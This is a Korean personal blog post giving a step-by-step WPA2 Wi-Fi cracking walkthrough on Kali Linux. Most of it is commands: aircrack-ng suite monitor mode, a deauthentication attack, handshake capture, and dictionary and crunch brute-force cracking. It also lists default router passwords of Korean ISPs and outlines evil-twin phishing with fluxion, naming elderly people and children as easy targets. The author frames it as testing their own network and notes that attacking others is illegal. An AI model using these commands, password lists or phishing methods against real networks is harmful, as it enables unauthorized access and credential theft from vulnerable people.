블로그 이미지
010-9967-0955 보미아빠

카테고리

보미아빠, 석이 (500)
밥벌이 (16)
싸이클 (1)
일상 (1)
Total
Today
Yesterday

달력

« » 2024.4
1 2 3 4 5 6
7 8 9 10 11 12 13
14 15 16 17 18 19 20
21 22 23 24 25 26 27
28 29 30

공지사항

최근에 올라온 글

wifi hacking

카테고리 없음 / 2023. 5. 6. 01:08

우리집 wifi 를 뚫어보자! 

 

우선 공격 도구로는 kali linux 가 필요하다. 노트북에 직접 설치된 kali linux는 ip a 나 iwconfig를 쳐보면 바로 wifi로 인식한다. 하지만, vmware나 virtual box 같은 가상화 도구를 쓰면, 외부 usb wifi 어댑터가 하나 필요하다. 가상화에서 pci로 연결된 wifi는 가상화 OS에서는 무선 인터넷으로 취급되지 않는다. bridge 모드로 해도 무선랜 모드로 되지 않는다. 왜 그런지는 모르겠다. 2010년대에 나온 어떤 소스로 인식은 시켜 봤는데 안되더라.

 

먼저 내 윈도우에 저장된 무선 wifi 암호는 아래 명령어로 확인 가능하다. bani 가 확인 대상이다. 이렇게 저장되어 있으니 공격자가 공격 패킷을 보내면, 장비가 다시 붙을려고 handshake 를 자동으로 수행한다. 

 

netsh wlan show profiles
netsh wlan show profile bani key=clear

 

아래 부터는 해킹인데, 뭐 그냥 스크립트 키드들이 주로 하는 방법이다. 재미로 봐라.

먼저 virtual box를 설치하고, kali linux 사이트에서 virtual box 이미지를 받아 설치한다. 이후 랜카드를 잡아야 하니 아래와 같은 삽질을 한다. apt-get install dkms 에러가 난다면 /etc/apt/sources.list를 수정한다. (아래 참고)

https://ourcodeworld.com/articles/read/961/how-to-solve-kali-linux-apt-get-install-e-unable-to-locate-package-checkinstall

 

How to solve Kali Linux apt-get install: E: Unable to locate package checkinstall

Learn how to solve the installation error of Check Install in Kali Linux.

ourcodeworld.com

deb http://http.kali.org/kali kali-rolling main contrib non-free
# For source package access, uncomment the following line
# deb-src http://http.kali.org/kali kali-rolling main contrib non-free
deb http://http.kali.org/kali sana main non-free contrib
deb http://security.kali.org/kali-security sana/updates main contrib non-free
# For source package access, uncomment the following line
# deb-src http://http.kali.org/kali sana main non-free contrib
# deb-src http://security.kali.org/kali-security sana/updates main contrib non-free
deb http://old.kali.org/kali moto main non-free contrib
# For source package access, uncomment the following line
# deb-src http://old.kali.org/kali moto main non-free contrib

 

apt-get update 를 수행한다. (utf8 관련 에러가 나는데 무시한다. )

apt-get install dkms 가 성공적으로 수행된다.

linux 재부팅

처음 kali 리눅스를 가상화 os를 이용해 wifi를 해킹하려면 usb wifi 드라이버를 설치해야 한다. 참고 https://mandoo12.tistory.com/entry/Linux-rtl88x2bu-driver-%EC%84%A4%EC%B9%98

 

[Linux] 리눅스에 무선랜카드 드라이버 rtl88x2bu 설치

rtl88x2bu driver REALTEK의 RTL88x2B 기반 USB 무선랜카드의 드라이버 설치 파일이다. RTL88x2B USB 무선랜카드를 사용하려면 rtl88x2bu-git.tar 드라이버를 설치해야한다. 1. Kali linux에서 터미널을 실행하고, 아래

mandoo12.tistory.com

 

rtl88x2bu driver REALTEK의 RTL88x2B 기반 USB 무선랜카드의 드라이버 설치 파일이다. RTL88x2B USB 무선랜카드를 사용하려면 rtl88x2bu-git.tar 드라이버를 설치해야한다. 알아서 설치 하시고..

 

기본 해킹 방법

 

# wifi 가 monitoring 모드여야 한다. 아래 명령어로 현재 상태 확인 
iwconfig

# 모니터링 모드로 들어가기  
airmon-ng check kill
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up
# airmon-ng start wlan0
# (ifconfig wlan0 up 과 같음)

# 모드 확인 
iwconfig

# 전체 덤프 후 공격 대상 선별 (신호가 크고, WPA2는 클라이언트가 있어야 해킹이 가능) 
airodump-ng wlan0

-c 채널 --bssid 가 공격대상 bssid -w 아웃풋 경로 마지막이 usb wifi  디바이스 명 
airodump-ng -c 6 --bssid AC:9E:17:72:AF:40 -w /home/kali/Desktop/ wlan0

# deAuth 를 해서 공격대상 AP 와 클라이언트가 핸드쉐이크 하도록 한다. 
aireplay-ng -0 10 -a  AC:9E:17:72:AF:40 bani

# 이제 위에 airodump-ng 해서 핸드쉐이크 패킷이 잡혔다고 뜬다. 

# 사전 공격 (학습이니 pass.txt 에 암호가 들어있게 만들어준다.)
# 캡처된 패킷과 암호가 맞으면 키를 찾았다고 뜬다. 
aircrack-ng -w ./pass.txt ./Desktop-02.cap
aircrack-ng -w ./pass.txt ./-02.cap
aircrack-ng -w /usr/share/dict/wordlist-probable.txt /home/kali/Desktop/hs/handshake_ollehWiFi09A1_08-5D-DD-8A-09-A5_2023-05-06T18-56-00.cap

 

아래와 같이 dictionary attack 이 성공할 수도 있지만 사전이 좋아야 한다. 사전은 github에 공개된 것이 많다.

 

git clone "https://github.com/danielmiessler/SecLists.git" /usr/src/SecListsgit

 

위 설명은 그냥 기본적인 설명이고 지루하고 타이핑을 많이 해야 한다. 그래서 python 자동화 공격 도구가 있는데 wifite2 정도가 있다. 일단 이것으로 시작해 패킷을 뜨면 저 위 handshake 패킷 까지는 자동으로 얻어진다. 아래는 암호까지 자동으로 다 크랙된 결과 스크린샷이다. (극적으로 보이게 하려고 암호를 워드 리스트에 추가했다. )

wifite 기본 사전파일 경로는 아래와 같다 . 과거 ap 의 기본 패스워드를 넣어두자.

 

/usr/share/dict/wordlist-probable.txt

 

예전 ap 의 기본 암호

 

1234567890
123456789a
sktelecom
987654321b
a123456789
1234
123456789a
987654321a
1234567890
myLGNetfe07
123456789a
987654321a
1234567890
myLGNetfe07
a0123456789
lguplus002
lguplus100
123456789
a123456789
sktelecom
vkflzmfktkd
16005252
2127393302
534f464354
1234
534F4B4354
SHOW3382
admin

 

아래 예제는 예전 특정 ap 기본 암호가 10자리 숫자였던 적이 있다. 그런 경우를 가정해 계산해 보니 내 노트북으로는 처음부터 넣으면, 10자리 암호는 약 23일이 걸리는 것을 알 수 있었다. 그런데, 해당 wifi 시리얼은 출시 연도부터 시작하는 것을 알고 있으니 좀 더 시간을 줄일 수 있기는 하다.

 

crunch 10 10 0123456789 | aircrack-ng -b AC:9E:17:72:AF:40 ./handshake_bani_AC-9E-17-72-AF-40_2023-05-06T18-52-56.cap -w-

 

그런데, 우리 집에는 3080 그래픽 카드가 있다. 이걸로 풀면 훨씬 빠르다. 그러나, 이렇게 무식하게 풀지 말고 좀 더 현명?하게 하는 방법이 있다. "너의 wifi ap 펌웨어 업데이트가 필요해 업데이트 하려면 wifi 암호를 넣어줘! 라고 wifi 연결된 클라이언트가 어떤 사이트 이던 들어가면 나오게 만드는 것이다." 그래 피싱이다. 피싱에서 가장 많이 쓰는 프로그램은 fluxion 인 듯 하다. 다른 애플리케이션도 있어 보인다. 이 어플은 자동으로 handshake packet을 잡고 fake ap를 만들어주고 web 서버 및 db 서버까지 자동으로 설정해 준다. 구동 시키고 사용자가 이게 뭐지? 펌웨어 업데이트하는데 암호를 넣으라는 건가? 하고 자기 wifi 암호를 입력해주면 입력한 암호가 해커의 db에 저장되는 방식이다. 나이가 지긋하신 분이나 초등학생들은 이런 지식이 없고 암호를 외우고 있는 경우가 가끔 있다. 이분들이 대상이다.

 

http://www.ktword.co.kr/test/view/view.php?m_temp1=1053

 

 

WPA

WPA, WPA2   Wi-Fi Protected Access   (2022-08-03)

www.ktword.co.kr

옆집 WIFI 해킹해서 쓰면 잡혀가는 완전한 불법이다. 뭐 어쩌라고? 지금 이게 우리 보안의 실정이다. 잘 알아서 지켜보자.

 

이하 의미 없는 삽질...그 wap2 일 때 그냥 1초만에 풀리는 뭐 좀 알려주시면 돈까스 쏩니다.

 

iw list
"Supported interface modes"에 monitor가 있을 경우 해당 WNIC는 모니터 모드로 전환 가능하다.

airmon-ng check

아래 파일을 구해서 virtual box 에서 usb wifi 없이 인식시켜 봤는데, 안되더라.

tar -jxvf compat-wireless-2010-06-26-p.tar
make unload
make load
Posted by 보미아빠
, |

최근에 달린 댓글

최근에 받은 트랙백

글 보관함